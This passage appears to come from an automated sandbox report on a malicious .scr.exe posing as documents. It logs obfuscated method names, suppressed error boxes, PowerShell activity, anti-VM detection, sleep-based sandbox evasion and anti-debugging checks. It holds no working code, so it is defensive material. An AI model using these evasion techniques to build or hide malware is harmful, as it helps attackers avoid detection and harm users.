                Source: 0.2.PASU5160894680 DOCS.scr.exe.7cd0000.4.raw.unpack, ln9Iv4CjcafXK1hTjl.csHigh entropy of concatenated method names: 'SJ7arIJkvy', 'h22a2m0x6A', 'uKZaACSX7o', 'WOQavC9qlh', 'zUTacwabwE', 'MCFaykQAqS', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.7cd0000.4.raw.unpack, Cv0gD6cuYxRYG4BACB.csHigh entropy of concatenated method names: 'u9jIuLs4S6', 'skDIdA4lUW', 'wYpIcYUqwB', 'sttIe3A5vX', 'vWCI2i28K9', 'G6bIApJmF7', 'MSjIvAom40', 'TNxIy79aIH', 'LMeIpQ7vbA', 'tktI6h2TDM'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.7cd0000.4.raw.unpack, DJgbrHqBZJQYLJgo1mB.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'giJYcNVkSg', 'ijFYeNKJG9', 'AkuYhwY5LH', 'LPpY0cP1LN', 'Y6BYSDBuqe', 'WdlYO0Y6mi', 'dmPYLF2pd3'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.7cd0000.4.raw.unpack, Ah58cHg4t3yBSjUWZk.csHigh entropy of concatenated method names: 'O5nRF41oUs', 'BeNR4nYnk3', 'XLfxAgafyG', 'iU6xvhruBV', 'iO6xyIu6X6', 'oH6xp9PDZi', 'OE3x6497Bn', 'FFTxbecv8j', 'tKNx9MMtog', 'HZIxubkjib'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.7cd0000.4.raw.unpack, khrQWT9aJS2Tbn07Yp.csHigh entropy of concatenated method names: 'Hc4MNWXhMt', 'F7pMZrMjdI', 'hmGMGaubUA', 'ASkMmFUuXH', 'dKxMFIuUq0', 'foXMWXGdsQ', 'xl9M4ocgS3', 'f0oMJ7Ehxx', 'UG6MHxTKX4', 'QWqMgpdwQM'

                Hooking and other Techniques for Hiding and Protection

                barindex
                Loading BitLocker PowerShell Module
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: PASU5160894680 DOCS.scr.exe PID: 7336, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\control.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\control.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\control.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\control.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\control.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\control.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\control.exeAPI/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\control.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeMemory allocated: 1610000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeMemory allocated: 33C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeMemory allocated: 53C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeMemory allocated: 80D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeMemory allocated: 90D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeMemory allocated: 9280000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeMemory allocated: A280000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0561096E rdtsc 4_2_0561096E
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6378Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2595Jump to behavior
                Source: C:\Windows\SysWOW64\control.exeWindow / User API: threadDelayed 4439Jump to behavior
                Source: C:\Windows\SysWOW64\control.exeWindow / User API: threadDelayed 5533Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\control.exeAPI coverage: 3.1 %
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe TID: 7356Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7664Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7652Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\control.exe TID: 7952Thread sleep count: 4439 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\control.exe TID: 7952Thread sleep time: -8878000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\control.exe TID: 7952Thread sleep count: 5533 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\control.exe TID: 7952Thread sleep time: -11066000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe TID: 8056Thread sleep time: -75000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe TID: 8056Thread sleep count: 35 > 30Jump to behavior
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe TID: 8056Thread sleep time: -52500s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe TID: 8056Thread sleep count: 42 > 30Jump to behavior
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe TID: 8056Thread sleep time: -42000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_00C6C1D0 FindFirstFileW,FindNextFileW,FindClose,6_2_00C6C1D0
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: uFLByAWAOFbhtV.exe, 0000000A.00000002.4132823778.000000000145F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllW
                Source: control.exe, 00000006.00000002.4132398440.0000000002F4A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000B.00000002.2139906459.000001998891C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\control.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0561096E rdtsc 4_2_0561096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_00417283 LdrLoadDll,4_2_00417283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560656A mov eax, dword ptr fs:[00000030h]4_2_0560656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560656A mov eax, dword ptr fs:[00000030h]4_2_0560656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560656A mov eax, dword ptr fs:[00000030h]4_2_0560656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D8550 mov eax, dword ptr fs:[00000030h]4_2_055D8550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D8550 mov eax, dword ptr fs:[00000030h]4_2_055D8550
